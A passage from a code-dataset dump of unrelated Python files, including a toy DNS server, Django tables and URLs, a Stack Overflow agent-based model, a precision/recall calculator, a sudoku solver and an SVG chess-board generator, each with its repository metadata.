(0).to_bytes(2, byteorder='big')\n ANCOUNT = len(records).to_bytes(2, byteorder='big')\n\n NSCOUNT = (0).to_bytes(2, byteorder='big')\n ARCOUNT = (0).to_bytes(2, byteorder='big')\n\n dns_header = ID + byte_1 + byte_2 + QDCOUNT + ANCOUNT + NSCOUNT + ARCOUNT\n domain_array = domain.split('.')\n\n question = b\"\"\n for part in domain_array:\n question += bytes([len(part)])\n for char in part:\n question += ord(char).to_bytes(1, byteorder='big')\n question += (0).to_bytes(1, byteorder='big')\n question += (1).to_bytes(2, byteorder='big')\n question += (1).to_bytes(2, byteorder='big')\n\n dns_body = b\"\"\n dns_body += question\n for record in records:\n dns_body += rec_to_bytes(record[\"ttl\"], record[\"value\"])\n\n return dns_header + dns_body\n\n\nload_zones()\n\nwhile True:\n req, addr = sock.recvfrom(512)\n resp = build_response(req)\n print(resp)\n sock.sendto(resp, addr)\n","repo_name":"7aske/dns-server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3943299792","text":"import unittest\nfrom your_application_module import calculate_simple_interest\n\nclass TestSimpleInterestCalculator(unittest.TestCase):\n\n def test_interest_calculation(self):\n principal = 1000\n rate = 5\n time = 2\n interest = calculate_simple_interest(principal, rate, time)\n self.assertEqual(interest, 100.0)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"sammiekiogora/aretech-microfinance","sub_path":"unit test.py","file_name":"unit test.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8139785865","text":"import django_tables2 as tables\nimport django_filters as filters\nfrom django.forms import widgets\nfrom .models import Request\nfrom staff.models import Staff\n\n\nclass RequestTable(tables.Table):\n created_on = tables.DateColumn(format=\"d.m.Y\")\n assigned_to = tables.ManyToManyColumn(verbose_name=\"Исполнители\", linkify_item=True)\n applicant = tables.Column(verbose_name=\"Заявитель\", linkify=True, accessor=\"applicant\")\n apartment = tables.Column(verbose_name=\"Помещение\", linkify=True)\n actions = tables.TemplateColumn(verbose_name=\"Действия\", template_name=\"misc/linkbuttons.html\", extra_context={\n 'view_link': 'requests:view',\n 'edit_link': 'requests:edit',\n 'remove_link': 'requests:remove'\n }, orderable=False, exclude_from_export=True)\n\n class Meta:\n model = Request\n fields = ['created_on', 'applicant', 'request_type', 'assigned_to', 'priority', 'is_proceed', 'closed_on',\n 'apartment']\n template_name = 'django_tables2/bootstrap4.html'\n attrs = {'class': 'table table-striped table-bordered text-center'}\n empty_text = \"Ничего не найдено\"\n\n\nclass RequestFilter(filters.FilterSet):\n created_on = filters.DateFromToRangeFilter(\n widget=filters.widgets.RangeWidget(attrs={'class': 'form-control date-range date'}))\n assigned_to = filters.ModelMultipleChoiceFilter(widget=widgets.SelectMultiple(attrs={'class': 'select2'}),\n queryset=Staff.objects.all())\n\n def __init__(self, *args, **kwargs):\n super(RequestFilter, self).__init__(*args, **kwargs)\n self.filters['created_on'].label = 'Дата (диапазон)'\n self.filters['assigned_to'].label = 'Исполнители'\n\n class Meta:\n model = Request\n fields = ['created_on', 'request_type', 'assigned_to', 'priority', 
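Most of `build_response` in the DNS record above assembles the 12-byte header field by field; the standard-library `struct` module can pack the six big-endian 16-bit header fields in one call. A sketch — the transaction id and the flag word are illustrative values, not taken from the record:

```python
import struct

def pack_dns_header(txn_id, flags, qd, an, ns, ar):
    # DNS header: six big-endian 16-bit fields (RFC 1035, section 4.1.1).
    return struct.pack("!6H", txn_id, flags, qd, an, ns, ar)

# 0x8180 = response, recursion desired and available, no error.
header = pack_dns_header(0x1a2b, 0x8180, 1, 1, 0, 0)
assert len(header) == 12
print(header.hex())  # -> 1a2b81800001000100000000
```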
'is_proceed']\n","repo_name":"noferai/comhome","sub_path":"requests/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32994466027","text":"\"\"\"Module containing the entities of the model (user, question and answer).\"\"\"\n\n# Imports\nimport numpy as np\n\n\nclass user:\n \"\"\"\n A Stack overflow user.\n\n Attributes\n ----------\n system : .system\n framework of the model\n id : int\n user id\n tag : int\n tag of user\n reputation : int\n reputation of the user\n p_ask : float\n probability to ask a question\n p_answer : float\n probability to answer a question\n p_interact : float\n probability to upvote a question/answer\n p_active : float\n probability of being active on the site\n vis_questions : list\n all the questions that can be seen by this user\n my_questions : list\n all the questions asked by this user\n upvote_bias : int\n number of upvotes the user is satisfied with\n n_questions_asked : int\n number of questions asked by the user\n n_questions_answered : int\n number of questions answered by the user\n n_questions_upvoted : int\n number of questions upvoted by the user\n n_answers_upvoted : int\n number of answers upvoted by the user\n p_ask_begin : float\n begin probability of asking\n p_answer_begin : float\n begin probability of answering\n p_interact_begin : float\n begin probability of upvoting\n p_active_begin : float\n begin probability of being active\n\n Methods\n -------\n ask_question()\n Generate a question.\n answer_question(q)\n Generate an answer.\n upvote(interaction, upvote)\n Check if question/answer is upvoted by the user.\n update_p(p, n_upvotes, bias)\n Update probability based on the number of upvotes received.\n eval()\n Evaluate a user's questions and corresponding answers.\n step()\n Timestep of a single user.\n \"\"\"\n\n def __init__(self, system, i, tag):\n \"\"\"\n Initialize a Stack overflow user.\n\n Parameters\n ----------\n system : .system\n model that represents the Stack oveflow framework\n i : int\n id of the user\n tag : int\n community that the user is part of\n \"\"\"\n # Model\n self.system = system\n\n # ID\n self.id = i\n self.tag = tag\n\n # Starting reputation\n self.reputation = 1\n\n # Probabilities to ask, answer, upvote, be active\n self.p_ask = 0\n self.p_answer = 0\n self.p_interact = 0\n self.p_active = 0\n\n # Visible questions/answeres (from people with the same tag)\n self.vis_questions = []\n self.my_questions = []\n\n # Number of upvotes the user is satisfied with\n self.upvote_bias = system.upvote_bias\n\n # Data storage\n self.n_questions_asked = 0\n self.n_questions_answered = 0\n\n self.n_questions_upvoted = 0\n self.n_answers_upvoted = 0\n\n self.p_ask_begin = 0\n self.p_answer_begin = 0\n self.p_interact_begin = 0\n self.p_active_begin = 0\n\n def ask_question(self):\n \"\"\"Generate a question.\"\"\"\n u = np.random.uniform()\n if u < self.p_ask:\n q = question(self.id, self.tag)\n self.my_questions.append(q)\n self.system.questions.append(q)\n\n # Make the question visible for all active people with the same tag\n for id in self.system.tags[self.tag]:\n if id != q.asker:\n u = np.random.uniform()\n if u < self.system.users[id].p_active:\n self.system.users[id].vis_questions.append(q)\n self.n_questions_asked += 1\n\n def answer_question(self, q):\n \"\"\"\n Generate an answer.\n\n Parameters\n ----------\n q : .question\n object of the class question\n\n Returns\n 
-------\n outcome : int\n 1 if question is answered\n 0 otherwise\n \"\"\"\n outcome = 0\n u = np.random.uniform()\n\n # Lower probability if the question is already answered\n x = np.log(self.p_answer/(1-self.p_answer))\n x -= len(q.answers)\n p_answer = 1 / (1 + np.exp(-x))\n\n if u < p_answer:\n a = answer(self.id, q.tag)\n q.answers.append(a)\n self.n_questions_answered += 1\n outcome = 1\n\n return outcome\n\n def upvote(self, interaction, upvotes):\n \"\"\"\n Check if question/answer is upvoted by the user.\n\n Parameters\n ----------\n interaction : .question or .answer\n object of the class question or answer\n upvotes : int\n number of upvotes given already this round\n\n Returns\n -------\n upvotes : int\n updated number of upvotes\n \"\"\"\n # Check if the reputation is high enough to upvote\n if self.reputation >= self.system.upvote_treshold:\n u = np.random.uniform()\n\n # Lower probability if the user has already upvoted question/answers\n x = np.log(self.p_interact/(1-self.p_interact))\n x -= upvotes\n p_upvote = 1 / (1 + np.exp(-x))\n\n # Upvote question/answer\n if u < p_upvote:\n interaction.upvotes.append(self.id)\n upvotes += 1\n if type(interaction) == question:\n self.n_questions_upvoted += 1\n id = interaction.asker\n else:\n self.n_answers_upvoted += 1\n id = interaction.responder\n\n # Increase the reputation\n self.system.users[id].reputation += 10\n\n return upvotes\n\n def update_p(self, p, n_upvotes, bias):\n \"\"\"\n Update probability based on the number of upvotes received.\n\n Parameters\n ----------\n p : float\n current probability\n n_upvotes : int\n number of upvotes\n bias : int\n min. number of upvotes a user is satisfied with\n\n Returns\n -------\n new_p : float\n new probability\n \"\"\"\n # Sensitivity coefficient\n coeff = 0.1\n\n diff = n_upvotes - bias\n # Limit the difference between -5 and 5\n diff = np.max((diff, -5))\n diff = np.min((diff, 5))\n\n # Inverse sigmoid function of the probability\n x = np.log(p/(1-p))\n x += (coeff * diff)\n\n # Calculate new probability using sigmoid function\n new_p = 1/(1+np.exp(-x))\n\n return new_p\n\n def eval(self):\n \"\"\"Evaluate a user's questions and corresponding answers.\"\"\"\n for q in self.my_questions[::-1]:\n q.age += 1\n\n # Give every user the chance to upvote all the answers\n if q.age == 2:\n # Update probability of asking and being active\n self.p_ask = self.update_p(self.p_ask, len(q.upvotes), self.upvote_bias)\n self.p_active = self.update_p(self.p_active, len(q.upvotes), self.upvote_bias)\n\n if q.answers:\n max = q.answers[0]\n for a in q.answers:\n if len(a.upvotes) > len(max.upvotes):\n max = a\n\n # Update probability of answering and being active\n user = self.system.users[a.responder]\n user.p_answer = self.update_p(user.p_answer, len(a.upvotes), user.upvote_bias)\n user.p_active = self.update_p(user.p_active, len(a.upvotes), user.upvote_bias)\n\n # Increase the reputation of the user that gave the answer with the most upvotes\n self.system.users[max.responder].reputation += 15\n\n else:\n # If there was no answer on the question, decrease reputation of asker (downvote)\n self.reputation -= 2\n self.reputation = np.max((self.reputation, 1))\n\n self.my_questions.remove(q)\n\n def step(self):\n \"\"\"Timestep of a single user.\"\"\"\n # Evaluate previous questions\n self.eval()\n\n # Determine if user will ask a question\n self.ask_question()\n\n # Sort the visible questions based on upvotes\n self.vis_questions.sort(key=lambda x: len(x.upvotes), reverse=True)\n q_upvoted = 0\n 
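`update_p` above nudges a probability by shifting it in logit space and mapping back through a sigmoid, so the result stays strictly inside (0, 1) no matter how much feedback accumulates. The same step in isolation, reusing the record's 0.1 sensitivity coefficient and its ±5 clamp:

```python
import math

def logit_update(p, n_upvotes, bias, coeff=0.1):
    diff = max(-5, min(5, n_upvotes - bias))  # clamp the feedback signal
    x = math.log(p / (1 - p)) + coeff * diff  # shift in logit space
    return 1 / (1 + math.exp(-x))             # map back through the sigmoid

p = 0.5
for _ in range(20):  # repeated positive feedback saturates but never reaches 1.0
    p = logit_update(p, n_upvotes=8, bias=2)
assert 0 < p < 1
print(round(p, 6))  # -> 0.999955
```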
for q in self.vis_questions:\n a_upvoted = 0\n # Upvote question\n q_upvoted = self.upvote(q, q_upvoted)\n # Answer question\n answered = self.answer_question(q)\n if not answered:\n q.answers.sort(key=lambda x: len(x.upvotes), reverse=True)\n # Upvote answers\n for a in q.answers:\n a_upvoted = self.upvote(a, a_upvoted)\n # Remove questions from the visible list\n self.vis_questions = []\n\n\nclass question:\n \"\"\"\n Represents a question asked by a user.\n\n Attributes\n ----------\n asker : int\n id of the user that asked the question\n tag : int\n tag (topic) of the question\n age : int\n number of timesteps the question exists\n upvotes : list\n ids of the users that have upvoted the question\n answers : list\n all the answers that were given on this question\n \"\"\"\n\n def __init__(self, id, tag):\n \"\"\"\n Initialize a question.\n\n Parameters\n ----------\n id : int\n id of the user that asked the question\n tag : int\n tag (topic) of the question\n \"\"\"\n self.asker = id\n self.tag = tag\n self.age = 0\n\n self.upvotes = []\n self.answers = []\n\n\nclass answer:\n \"\"\"\n Represents an answer given by a user.\n\n Attributes\n ----------\n responder : int\n id of the user that gave the answer\n tag : int\n tag (topic) of the question/answer\n upvotes : list\n ids of the users that have upvoted the answer\n \"\"\"\n\n def __init__(self, id, tag):\n \"\"\"\n Initialize an answer.\n\n Parameters\n ----------\n id : int\n id of the user that answered the question\n tag : int\n tag (topic) of the question/answer\n \"\"\"\n self.responder = id\n self.tag = tag\n\n self.upvotes = []\n","repo_name":"AaronDC60/ABM_stackoverflow_network","sub_path":"code/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":10431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31149806533","text":"# AUTHOR: Andre Rosa\n# DATE: 09 FEB 2019\n# OBJECTIVE: A generic calculator for Precision and Recall\n# The program work with two csv files that contain a videoName as first column and \n# a list of booleans for the rest of columns. 
\n\n# to run the code: python CalcPR.py groundTruthFile.csv Estimate.csv [list of categories]\n# if no list of categories the code will consider all categories\n\nimport csv\nimport os # for the runtime exit\nimport sys # for arguments input\nfrom Categories import NewCat\n\n#-------------------------------------------------------------------\n# CLASS LINE HOLDS EACH VIDEO NAME AND RELATED CATEGORIES\n# this class represents each line from the csv file, the first field is the name of the video \n# while the categories is a list of booleans 0,1\n#-------------------------------------------------------------------\nclass Line:\n\n NR_CATEGORIES = 0 #static variable to hold the number of categories\n\n def __init__(self, name, categories):\n self.name = name\n self.categories = categories\n \n Line.NR_CATEGORIES = len(categories)\n \n def isCategory (self, catIndex): # Return true if video belongs to category\n ''' Return the boolean value for the category '''\n\n return bool(self.categories[catIndex])\n\n def getVidName (self):\n return self.name\n\n def getCategories (self):\n return self.categories\n\n def getNumberofCategories (self):\n ''' Return the number of categories in a line '''\n return len(self.categories)\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# USED TO SHOW COLOR IN TERMINAL\n#-------------------------------------------------------------------\nclass sysColor:\n Red = '\\033[91m'\n Green = '\\033[92m'\n Blue = '\\033[94m'\n Cyan = '\\033[96m'\n White = '\\033[97m'\n Yellow = '\\033[93m'\n Magenta = '\\033[95m'\n Default = '\\033[99m'\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# READ A CSV FILE AND SAVES IN A LIST DATA STRUCTURE\n#-------------------------------------------------------------------\ndef readCSVFile (fileName):\n ''' Read the csv file and saves in a list structure '''\n\n lList = []\n lBolCat = [] # a list of booleans for categories \n\n # read the file and fill the video list\n with open(fileName) as csv_file:\n\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n line_count += 1\n\n vidName = row[0] # save video name (position [0] in the row)\n for i in range (1, len(row)):\n lBolCat.append(int(row[i]) ) # append the boolean to the list\n\n lLine = Line (vidName, lBolCat[:]) # create a line object, use the [:] to pass the variable by value\n lList.append(lLine) # append the line object to the list of videos\n lBolCat.clear() # clear the list\n\n print(f'Processed from {fileName} ' + sysColor.Green + str(line_count) + sysColor.White + ' lines.')\n return lList\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# CHECK IF THE STRUCTURE (ROWS AND COLUMNS) ARE THE SAME ON BOTH FILES\n#-------------------------------------------------------------------\ndef checkStructure (testVid, catVid):\n ''' Check if two csv files have the same number of columns and rows ''' \n isOK = False\n tRow = len(testVid) # number of rows\n cRow = len(catVid)\n\n if ((tRow > 0) and (tRow == cRow)): # if they have the same number of rows\n if (testVid[0].getNumberofCategories() == catVid[0].getNumberofCategories()):\n isOK = True\n \n return 
isOK\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# CHECK IF THE ARGUMENTS ARE OK\n#-------------------------------------------------------------------\ndef checkArguments(args):\n ''' Check the validity of the arguments passed. '''\n\n if (len(args) == 1 ): # number of arguments is ok?\n print(sysColor.Red + 'ATTENTION:' + sysColor.White + ' Invalid number of arguments, type \"CalcPR --help\" for help.')\n return False\n\n if (args[1] == '--help'): # calls help\n print(sysColor.Green + 'Use the following arguments:\\n' + \n sysColor.Green + '1' + sysColor.White + ' - csv file with ground truth.\\n' + \n sysColor.Green + '2' + sysColor.White + ' - csv file with estimation to be evaluated.\\n' + \n sysColor.Green + '3' + sysColor.White + '... - name of categories to test (separated by spaces).\\n' +\n sysColor.Yellow + 'If no category is selected the program runs all categories' + sysColor.White )\n return False\n\n suffix = '.csv'\n if (not( (args[1].endswith(suffix) == True) and (args[2].endswith(suffix) == True) )): # check if the files are csv files\n print (sysColor.Red + 'ATTENTION:' + sysColor.White + ' First and second arguments must be .csv files')\n return False\n\n return True\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n#\n#-------------------------------------------------------------------\ndef getCategoriesToRun(args):\n\n from Categories import NewCat\n bolCats = []\n\n for i in range (0,Line.NR_CATEGORIES): # fill the categories list with falses\n bolCats.append (False)\n\n #get the categories passed as paremeters in terminal\n cats = args[3:] # the arguments 3 and onwards are the categories\n \n if (len(cats) >= 1 ): \n print ('Categories selected: ' + sysColor.Blue + str(cats) + sysColor.White)\n for cat in cats:\n # 1. check if category name exist in list and get the index\n for i in range (0, len(NewCat) ):\n if (cat == NewCat[i]):\n bolCats[i] = True\n\n else: # no category selected do all categories\n print ('All categories selected')\n for i in range (0,Line.NR_CATEGORIES): # fill the categories list iwth falses\n bolCats[i] = True\n \n return bolCats\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# CLEAR THE TERMINAL SCREEN\n# platform.system() identifies the OS 'Linux', 'Windows' or 'Darwin'(for MacOS)\n#-------------------------------------------------------------------\ndef clearTerminal():\n import platform\n if ( platform.system() == 'Windows'): os.system('cls')\n else: os.system('clear')\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\ndef execute ():\n\n clearTerminal()\n\n # 0. Test the arguments\n if (checkArguments(sys.argv) == False):\n os._exit(1)\n\n # 1. read the GROUND TRUTH csv\n #print ('1. Load file with ground truth.')\n testVid = readCSVFile (sys.argv[1]) # (\"TestBOOLEANGroundTruth.csv\") \n\n # 2. Read the ESTIMATED CATEGORIES csv\n #print ('2. Load file with estimated categories.')\n cateVid = readCSVFile (sys.argv[2]) # (\"TestBOOLEANUnWeightVote.csv\")\n\n # 3. Test if structure (number of columns and rows) of both files are the same\n #print ('3. 
Checking if both files have the same number of categories.')\n if ( checkStructure (testVid, cateVid) == False):\n print (sysColor.Red + 'ATTENTION:' + sysColor.White + ' Files do not have the same number of columns and rows!' )\n os._exit(1)\n\n # 4. Get list of categories to test, the return is a list of booleans with the categories to calculate\n #print ('4. Get category list.')\n print (sysColor.Red + \"number of categories \" + str(Line.NR_CATEGORIES) + sysColor.White)\n categoryToRun = getCategoriesToRun (sys.argv)\n \n RE_List = [] #relevant result list\n TP_List = [] #true positive list\n FP_List = [] #false positive list\n precision = [] #to store the results of the precision\n recall = [] #to store the result of the racll calculation\n fScore = [] #to store the F1 Score\n catNames = [] #saves the names of the selected categories for \n\n # 5. For each Category\n for index in range (0,Line.NR_CATEGORIES): # loop the number of categories\n \n if (categoryToRun[index] == True): # if the category was selected then calculate\n\n currentCat = NewCat[index]\n catNames.append(currentCat) # save the category name for later use\n\n # 5.0 loop to find the number of relevant occurences for each category\n #----------------------------------------------------------------\n relevantElements = 0 \n #loop to sum all relevant elements\n for vid in testVid:\n if (vid.isCategory(index) == True): \n relevantElements += 1\n print(f'Relevant elements found for category {currentCat} -> {relevantElements} ')\n RE_List.append(relevantElements * 1.0) #multiplying by 1.0 to save a float value for later calculations \n #----------------------------------------------------------------\n\n\t #5.1. loop to find the true positives - category exist in both vote and test\n #----------------------------------------------------------------\n truePositives = 0 \n #loop to sum all relevant elements\n for i in range (0, len(cateVid) ):\n if ((testVid[i].isCategory(index)==True) and (cateVid[i].isCategory(index)==True)):\n truePositives += 1\n print(f'True Positives found for category {currentCat} -> {truePositives} ')\n TP_List.append(truePositives * 1.0) #multiplying by 1.0 to save the float value\n #---------------------------------------------------------------- \n\n\t #5.2 loop to find the false positives - category exist in vote but not in test\n #----------------------------------------------------------------\n #loop to find the false positives - category exist in vote but not in test\n falsePositives = 0 \n #loop to sum all relevant elements\n for i in range (0, len(cateVid) ):\n if ((testVid[i].isCategory(index)== False) and (cateVid[i].isCategory(index) == True)):\n falsePositives += 1\n print(f'False Positives found for category {currentCat} -> {falsePositives} ')\n FP_List.append(falsePositives * 1.0) #multiplying by 1.0 to save the float value\n #----------------------------------------------------------------\n\n\t#6. Calculates precision and recall for each category\n for i in range(len(FP_List)):\n if (TP_List[i] != 0):\n precision.append(100.0 * TP_List[i] / (TP_List[i] + FP_List[i])) \n recall.append(100.0 * TP_List[i] / RE_List[i])\n else:\n precision.append(0.0)\n recall.append(0.0)\n\n #7. 
Calculate the fScore\n for i in range(len(FP_List)):\n if (TP_List[i] != 0):\n fScore.append( 2 * (precision[i] * recall[i]) / (precision[i] + recall[i]) )\n else:\n fScore.append (0.0)\n\n for i in range(len(precision)):\n print (f'Category: {catNames[i]} - precision: {precision[i]} - recall: {recall[i]} ')\n\n\t#8. save output to file\n #--------------------------------------\n catNames.insert(0, \"CATEGORIES\")\n precision.insert(0, \"precision\")\n recall.insert(0, \"recall\")\n fScore.insert(0, \"f_score\")\n myData = [catNames, precision, recall, fScore] \n myFile = open('PR_output.csv', 'w') \n with myFile: \n writer = csv.writer(myFile)\n writer.writerows(myData)\n catNames.pop(0)\n precision.pop(0)\n recall.pop(0)\n fScore.pop(0)\n #--------------------------------------\n\n #saves the report in another file\n catNames.insert(0, \"CATEGORIES\")\n RE_List.insert(0, 'relevant')\n TP_List.insert(0, 'true_positives')\n FP_List.insert(0, 'false_positives')\n myData = [catNames, RE_List, TP_List, FP_List] \n myFile = open('report.csv', 'w') \n with myFile: \n writer = csv.writer(myFile)\n writer.writerows(myData)\n catNames.pop(0)\n RE_List.pop(0)\n TP_List.pop(0)\n FP_List.pop(0)\n\n #now saves precision and recall in a csv file (A NEW FORMAT TO GENERATE A DIAGRAM EASIER)\n # Save in the csv file\n text_file = open(\"outputForGraph.csv\", \"w\")\n for i in range(len(precision)):\n text_file.write(catNames[i] + ',' + str(precision[i]/100) + ','+ str(recall[i]/100) + ',' + str(fScore[i]/100) + '\\n')\n text_file.close()\n\ndef main ():\n execute()\n\nmain()\n","repo_name":"Cadesh/Python_Attic","sub_path":"PrecisionRecall/CalcPR.py","file_name":"CalcPR.py","file_ext":"py","file_size_in_byte":12926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42105199987","text":"#\r\n# Code to preview metadata for the \"NOAA Fisheries Steller Sea Lion Population Count\" dataset:\r\n#\r\n# https://www.kaggle.com/competitions/noaa-fisheries-steller-sea-lion-population-count\r\n#\r\n\r\n#%% Imports and constants\r\n\r\nimport os\r\nimport pandas as pd\r\n\r\ntrain_folder = r'g:\\temp\\drone-datasets\\noaa-fisheries-steller-sea-lion-population-count\\Train'\r\ntrain_metadata_file = r'train.csv'\r\ntrain_metadata_path = os.path.join(train_folder,train_metadata_file)\r\n\r\nassert os.path.isdir(train_folder)\r\nassert os.path.isfile(train_metadata_path)\r\n\r\n\r\n#%% Process metadata, make sure files exist\r\n\r\ndf = pd.read_csv(train_metadata_path)\r\n\r\nprint('Loaded metadata for {} images'.format(len(df)))\r\n\r\nn_animals = 0\r\n\r\nfor i_row,row in df.iterrows():\r\n train_id = row['train_id']\r\n image_file = os.path.join(train_folder,str(train_id) + '.jpg')\r\n assert os.path.isfile(image_file)\r\n n_animals += (row['adult_males']+row['subadult_males']+row['adult_females']+row['juveniles']+row['pups'])\r\n\r\nprint('Counts total {} animals'.format(n_animals))","repo_name":"agentmorris/agentmorrispublic","sub_path":"aerial-drone-data-preview/preview-steller-sea-lion-count.py","file_name":"preview-steller-sea-lion-count.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"76"} +{"seq_id":"42643412498","text":"import sys\n\ndef backtraking(depth):\n global exit_flag\n\n if (depth == len(blank_list)):\n exit_flag = True\n for i in range(9):\n for j in range(9):\n print(sudoku_board[i][j], end = \" \")\n print()\n \n else:\n for k in range(1, 10):\n if 
(exit_flag):\n break\n\n if (row_check(blank_list[depth][0], k) and column_check(blank_list[depth][1], k) and box_check(blank_list[depth][0], blank_list[depth][1], k)):\n sudoku_board[blank_list[depth][0]][blank_list[depth][1]] = k\n backtraking(depth + 1)\n sudoku_board[blank_list[depth][0]][blank_list[depth][1]] = 0\n\ndef row_check(row, cell):\n for i in range(9):\n if (sudoku_board[row][i] == cell):\n return False\n return True\n\ndef column_check(column, cell):\n for i in range(9):\n if (sudoku_board[i][column] == cell):\n return False\n return True\n\ndef box_check(row, column, cell):\n for i in range(row // 3 * 3, row // 3 * 3 + 3):\n for j in range(column // 3 * 3, column // 3 * 3 + 3):\n if (sudoku_board[i][j] == cell):\n return False\n return True\n\nsudoku_board = []\nblank_list = []\n\nfor i in range(9):\n sudoku_board.append(list(map(int, sys.stdin.readline().split())))\n\nfor i in range(9):\n for j in range(9):\n if (sudoku_board[i][j] == 0):\n blank_list.append([i, j])\n\nexit_flag = False\n\nbacktraking(0)","repo_name":"Choojj/acmicpc","sub_path":"단계별/15. 백트래킹/06. 스도쿠.py","file_name":"06. 스도쿠.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14368698834","text":"from django.urls import re_path\r\nfrom . import views\r\n\r\n\r\nurlpatterns = [\r\n re_path(r'^index/{0,1}$', views.index, name='index'),\r\n re_path(r'^article/\\d{4,4}/\\d{1,2}/(?P\\d+)/{0,1}$', views.article),\r\n re_path(r'^articles/list/{0,1}$', views.article_list, name='article_list'),\r\n re_path(r'^addArticle/{0,1}$', views.addArticle, name='addArticle'),\r\n re_path(r'^modifyArticle/(?P\\d+)/{0,1}$', views.modifyArticle, name='modifyArticle'),\r\n re_path(r'^deleteArticle/(?P\\d+)/{0,1}$', views.deleteArticle, name='deleteArticle'),\r\n re_path(r'^accounts/login/{0,1}$', views.login, name='login'),\r\n re_path(r'^accounts/logout/{0,1}$', views.logout, name='logout'),\r\n re_path(r'test/markdown/{0,1}$', views.test, name='test'),\r\n]","repo_name":"nigelaji/myblog","sub_path":"myblog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15071488161","text":"class Solution:\n def findSpecialInteger(self, arr: List[int]) -> int:\n n = len(arr)\n span = n // 4 + 1\n for i in range(0, n, span):\n l = bisect.bisect_left(arr, arr[i])\n r = bisect.bisect_right(arr, arr[i])\n if r - l >= span:\n return arr[i]\n return -1\n","repo_name":"woozway/py3-LeetCode","sub_path":"algorithms/1287. Element Appearing More Than 25% In Sorted Array.py","file_name":"1287. 
Element Appearing More Than 25% In Sorted Array.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37256652667","text":"import Evaluator, Parser\r\n\r\ndef interpreter():\r\n # Asks for user input for a program\r\n program = input(\"Please enter a LISP program:\\n\")\r\n # Parses the program then evaluates and prints the result\r\n print(Evaluator.eval(Parser.parse(program)))\r\n\r\n\r\ninterpreter()","repo_name":"kqian5/Lisp-Interpreter","sub_path":"Interpreter.py","file_name":"Interpreter.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34342833765","text":"filename = \"12-中国象棋棋盘.svg\"\nboard_rect = [0, 0, 10, 11]\nout_rect = [0, 0, 8, 9]\nlines = []\ngrid = 30 # 每个格子的像素\nfor i in range(1, 9):\n lines.append((0, i, 8, i))\nfor i in range(1, 8):\n if i == 0 or i == 8:\n lines.append((i, 0, i, 9))\n else:\n lines.append((i, 0, i, 4))\n lines.append((i, 5, i, 9))\nlines.append((3, 0, 5, 2))\nlines.append((5, 0, 3, 2))\nlines.append((3, 9, 5, 7))\nlines.append((3, 7, 5, 9))\n\n\ndef get_rect(rect):\n return f''\n\n\ndef get_stroke_rect(rect):\n rect = [i + 1 for i in rect]\n w, h = rect[2] - rect[0], rect[3] - rect[1]\n return f''''''\n\n\ndef get_line(line):\n line = [i + 1 for i in line]\n return f''\n\n\ndef line_str():\n return '\\n'.join(get_line(line) for line in lines)\n\n\nsvg = f\"\"\"\n\n 画一个象棋棋盘\n 有两下子\n {get_rect(board_rect)}\n {get_stroke_rect(out_rect)}\n {line_str()}\n\n\"\"\"\nopen(filename, 'w').write(svg)\n","repo_name":"weiyinfu/learnSvg","sub_path":"11-中国象棋棋盘.py","file_name":"11-中国象棋棋盘.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39419627872","text":"from collections import Counter, namedtuple\nimport csv\n\ndef get_header(csv_stream):\n header = csv_stream.__next__()\n for colno, column in enumerate(header):\n header[colno] = column.strip()\n return header\n\ndef main():\n cntr = Counter()\n with open(r'C:\\Users\\Phil\\pytalk\\Building_Permits.csv') as csv_file:\n csv_reader = csv.reader(csv_file)\n header = get_header(csv_reader)\n building_permit = namedtuple('BuildingPermit',header, rename=True)\n for line in csv_reader:\n fields = building_permit(*line)\n cntr['Total lines'] += 1\n cntr[fields.PERMIT_TYPE] += 1\n paid = float(fields.AMOUNT_PAID[1:])\n cntr[fields.PERMIT_TYPE+'_paid'] += paid\n cntr['Total paid'] += paid\n print(\"Report on columns PERMIT_TYPE and AMOUNT_PAID\\n\")\n for ctr in sorted(cntr.keys()):\n if ctr == 'Total lines':\n print('%-30s %8d %6.2f %15.2f %6.2f' % (ctr, cntr[ctr],\n ((cntr[ctr]*100)/cntr['Total lines']),\n cntr['Total paid'],\n 100.0))\n elif not ctr.endswith('paid'):\n print('%-30s %8d %6.2f %15.2f %6.2f' % (ctr, cntr[ctr],\n ((cntr[ctr]*100)/cntr['Total lines']),\n cntr[ctr+'_paid'],\n ((cntr[ctr+'_paid']*100)/cntr['Total paid'])))\n\nif __name__ == '__main__':\n 